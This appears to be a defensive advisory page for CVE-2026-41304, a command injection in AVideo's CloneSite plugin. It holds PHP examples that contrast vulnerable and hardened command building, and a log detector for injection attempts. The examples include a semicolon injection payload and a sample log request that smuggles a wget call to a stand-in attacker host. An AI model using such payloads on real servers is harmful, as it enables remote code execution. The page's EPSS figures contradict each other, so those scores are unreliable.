Cyber Resilience

CVE-2026-41304

High · Public PoC · RCE

Published: 22 April 2026
Modified: 24 April 2026
KEV Added: not listed
Patch: available (commit 473c609fc2defdea8b937b00e86ce88eba1f15bb)
CVSS v4 score: 8.9 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X)
EPSS score: 0.0222 (80.4th percentile)
Risk priority: 55 (floored blend · peak EPSS)

Summary

CVE-2026-41304 is a high-severity command injection (CWE-77) vulnerability in WWBN AVideo, with a CVSS v4 base score of 8.9 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 19.6% of CVEs by exploit likelihood (EPSS), is not currently listed in the CISA KEV catalog, and has a public proof-of-concept referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

WWBN AVideo is an open source video platform that contains a command injection vulnerability in versions 29.0 and below. The flaw resides in the cloneServer.json.php endpoint of the CloneSite plugin, which constructs shell commands by directly concatenating unsanitized user input from the url parameter into a wget command executed via exec(). This allows an attacker to break out of the intended URL context using shell metacharacters such as semicolons, resulting in arbitrary command execution on the server. The issue is tracked under CWE-77 and carries a CVSS 4.0 score of 8.9.

The endpoint is reachable over the network without authentication or user interaction, so a remote attacker can achieve full remote code execution, running arbitrary shell commands with the privileges of the PHP process on the affected server.

The vulnerability is fixed in commit 473c609fc2defdea8b937b00e86ce88eba1f15bb, with details published in the associated GitHub security advisory GHSA-xr6f-h4x7-r6qp.

The EPSS score peaked at 0.0131 and currently stands at 0.0065, indicating limited but observable post-disclosure interest.

Vulnerability details

WWBN AVideo is an open source video platform. In versions 29.0 and below, the `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection. An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to Remote Code Execution (RCE) on the server. Commit 473c609fc2defdea8b937b00e86ce88eba1f15bb contains a fix.
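The following is an added example, not code from the page or from the AVideo project. It reproduces the pattern the advisory describes (a user-controlled `url` value spliced into a `wget` command line destined for `exec()`) next to a hardened builder that validates the URL and quotes it with `escapeshellarg()`. The function names, the output path and the payload are assumptions for illustration; neither builder calls `exec()`, both only return the command string so the difference can be inspected safely. The same block also illustrates the SI-10 input-validation control listed under Mitigating Controls.

```php
<?php
// Added example (not AVideo's code). Shows the vulnerable concatenation
// pattern from the advisory beside a hardened form. Function names, the
// /tmp/clone output path and the payload are assumptions. Nothing here
// executes a command; both builders return the command string only.

declare(strict_types=1);

// Vulnerable pattern: the raw parameter is spliced straight into the shell
// line, so any metacharacter in $url is interpreted by /bin/sh.
function buildVulnerableCommand(string $url): string
{
    return 'wget -O /tmp/clone/site.zip ' . $url;
}

// Hardened pattern: reject control bytes, require an absolute http(s) URL,
// then pass the value as a single quoted argv word via escapeshellarg().
function buildHardenedCommand(string $url): ?string
{
    if (preg_match('/[\x00-\x1f\x7f]/', $url) === 1) {
        return null;                                 // control characters: reject
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                                 // not an absolute URL
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                                 // only web schemes are cloneable
    }
    // escapeshellarg() wraps the value in single quotes and escapes embedded
    // single quotes, so ';', '|', '`' and '$(...)' lose their shell meaning.
    return 'wget -O /tmp/clone/site.zip ' . escapeshellarg($url);
}

// Constructed payload: the semicolon break-out the advisory describes.
$payload = 'http://example.com/;id';

echo 'vulnerable: ', buildVulnerableCommand($payload), PHP_EOL;
echo 'hardened:   ', buildHardenedCommand($payload) ?? '(rejected)', PHP_EOL;
echo 'hardened:   ', buildHardenedCommand('file:///etc/passwd') ?? '(rejected)', PHP_EOL;
```

For the payload, the vulnerable builder yields a line in which `;id` is a second shell command, while the hardened builder yields `'http://example.com/;id'` as one argument, so `wget` receives the semicolon as part of the URL and no second command runs; the `file://` input is rejected by the scheme allowlist. Quoting is the essential control: a blocklist of metacharacters is easy to bypass and should only supplement it. Where the shell is not needed at all, PHP 7.4 and later can run `proc_open()` with an array command, which executes the program directly without any shell parsing.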

CWE(s)

CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-assisted mapping)

T1190 Exploit Public-Facing Application (Initial Access): adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Unix Shell (Execution): adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

Unauthenticated command injection in a public-facing web endpoint enables exploitation of public-facing applications (T1190) and execution of arbitrary Unix shell commands (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
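To turn the T1190 mapping into something a SOC can act on, the following added example (not from the page or the AVideo project) scans constructed web-server access-log lines for requests to the CloneSite endpoint whose `url` parameter carries shell metacharacters after URL-decoding. The log lines, client addresses and the `/plugin/CloneSite/` path prefix are assumptions; only the `cloneServer.json.php` file name comes from the advisory.

```php
<?php
// Added example (not AVideo's code). Heuristic detection of command-injection
// attempts against cloneServer.json.php in combined-format access logs.
// Sample log lines below are constructed; the /plugin/CloneSite/ path prefix
// is an assumption.

declare(strict_types=1);

const ENDPOINT = 'cloneServer.json.php';

// Tokens that terminate or chain a command, or start a substitution. Kept
// narrow (no bare '&' or '$') to limit false positives on ordinary URLs.
const SHELL_META = '/;|\||`|\$[({]|&&|[\n\r]/';

function findInjectionAttempts(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Request line: "METHOD /path?query HTTP/x.y"
        if (preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m) !== 1) {
            continue;
        }
        $target = $m[1];
        if (strpos($target, ENDPOINT) === false) {
            continue;
        }
        $query = parse_url($target, PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;
        }
        parse_str($query, $params);            // URL-decodes each value once
        if (!isset($params['url']) || !is_string($params['url'])) {
            continue;
        }
        // Decode a second time: double-encoding is a common way past naive filters.
        $decoded = urldecode($params['url']);
        if (preg_match(SHELL_META, $decoded) === 1) {
            $ip = preg_match('/^(\S+) /', $line, $ipm) === 1 ? $ipm[1] : '?';
            $hits[] = ['ip' => $ip, 'url' => $decoded, 'line' => $line];
        }
    }
    return $hits;
}

// Constructed sample: a benign clone request, a semicolon break-out,
// a double-encoded break-out, and an unrelated request.
$sample = [
    '203.0.113.7 - - [22/Apr/2026:10:01:02 +0000] "GET /plugin/CloneSite/cloneServer.json.php?url=https%3A%2F%2Fexample.com%2F HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Apr/2026:10:01:09 +0000] "GET /plugin/CloneSite/cloneServer.json.php?url=http%3A%2F%2Fexample.com%2F%3Bid HTTP/1.1" 200 88 "-" "curl/8.5.0"',
    '198.51.100.3 - - [22/Apr/2026:10:02:30 +0000] "GET /plugin/CloneSite/cloneServer.json.php?url=http%3A%2F%2Fexample.com%2F%253Bwget%2520http%253A%252F%252Fattacker.invalid%252Fx HTTP/1.1" 200 88 "-" "python-requests/2.31"',
    '198.51.100.3 - - [22/Apr/2026:10:03:00 +0000] "GET /view/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

foreach (findInjectionAttempts($sample) as $hit) {
    fwrite(STDOUT, "{$hit['ip']} suspicious url parameter: {$hit['url']}" . PHP_EOL);
}
```

Only the second and third sample lines are reported: the plain request to `https://example.com/` carries no metacharacter, and the unrelated request never reaches the parameter check. Two caveats apply in practice: access logs record only the query string, so a `url` value sent in a POST body is invisible here and needs application-level or WAF logging, and `;` or `|` can occur in legitimate URLs, so treat a hit as a triage lead and tune the token list to the environment.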

CVEs Like This One

CVE-2026-33319 (same product: WWBN AVideo)
CVE-2026-41064 (same product: WWBN AVideo)
CVE-2026-33648 (same product: WWBN AVideo)
CVE-2026-33482 (same product: WWBN AVideo)
CVE-2026-33478 (same product: WWBN AVideo)
CVE-2026-33292 (same product: WWBN AVideo)
CVE-2026-33479 (same product: WWBN AVideo)
CVE-2026-33767 (same product: WWBN AVideo)
CVE-2026-33770 (same product: WWBN AVideo)
CVE-2026-33038 (same product: WWBN AVideo)

Affected Assets

wwbn:avideo, versions ≤ 29.0

Mitigating Controls (NIST 800-53 r5, AI-assisted mapping)

SI-10 Information Input Validation (prevent): requires validation and sanitization of the untrusted url parameter before it is concatenated into a shell command executed via exec().

SI-2 Flaw Remediation (prevent): mandates prompt application of the vendor fix (commit 473c609) that eliminates the unsanitized command construction in cloneServer.json.php.

Prevent: restricts availability of dangerous functions such as exec() (for example through PHP's disable_functions directive) and of external utilities like wget that the vulnerable endpoint relies on.
